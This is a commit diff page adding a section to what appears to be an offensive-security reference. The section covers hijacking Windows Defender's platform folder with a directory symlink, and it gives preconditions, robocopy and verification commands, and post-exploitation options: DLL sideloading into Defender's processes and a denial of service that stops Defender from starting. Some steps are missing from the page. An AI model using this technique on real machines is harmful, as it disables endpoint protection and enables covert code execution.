You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
It selects the subfolder with the highest lexicographic version string (e.g., `4.18.25070.5-0`), then starts the Defender service processes from there (updating service/registry paths accordingly). This selection trusts directory entries including directory reparse points (symlinks). An administrator can leverage this to redirect Defender to an attacker-writable path and achieve DLL sideloading or service disruption.
936
+
937
+
Preconditions
938
+
- Local Administrator (needed to create directories/symlinks under the Platform folder)
939
+
- Ability to reboot or trigger Defender platform re-selection (service restart on boot)
940
+
- Only built-in tools required (mklink)
941
+
942
+
Why it works
943
+
- Defender blocks writes in its own folders, but its platform selection trusts directory entries and picks the lexicographically highest version without validating that the target resolves to a protected/trusted path.
944
+
945
+
Step-by-step (example)
946
+
1) Prepare a writable clone of the current platform folder, e.g. `C:\TMP\AV`:
947
+
```cmd
948
+
set SRC="C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0"
949
+
set DST="C:\TMP\AV"
950
+
robocopy %SRC% %DST% /MIR
951
+
```
952
+
2) Create a higher-version directory symlink inside Platform pointing to your folder:
4) Verify MsMpEng.exe (WinDefend) runs from the redirected path:
961
+
```powershell
962
+
Get-Process MsMpEng | Select-Object Id,Path
963
+
# or
964
+
wmic process where name='MsMpEng.exe' get ProcessId,ExecutablePath
965
+
```
966
+
You should observe the new process path under `C:\TMP\AV\` and the service configuration/registry reflecting that location.
967
+
968
+
Post-exploitation options
969
+
- DLL sideloading/code execution: Drop/replace DLLs that Defender loads from its application directory to execute code in Defender’s processes. See the section above: [DLL Sideloading & Proxying](#dll-sideloading--proxying).
970
+
- Service kill/denial: Remove the version-symlink so on next start the configured path doesn’t resolve and Defender fails to start:
> Note that This technique does not provide privilege escalation by itself; it requires admin rights.
977
+
930
978
## References
931
979
932
980
-[Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
@@ -940,6 +988,8 @@ References for PPL and tooling
940
988
-[Sysinternals – Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon)
-[Zero Salarium – Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
991
+
-[Zero Salarium – Break The Protective Shell Of Windows Defender With The Folder Redirect Technique](https://www.zerosalarium.com/2025/09/Break-Protective-Shell-Windows-Defender-Folder-Redirect-Technique-Symlink.html)
-[Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
0 commit comments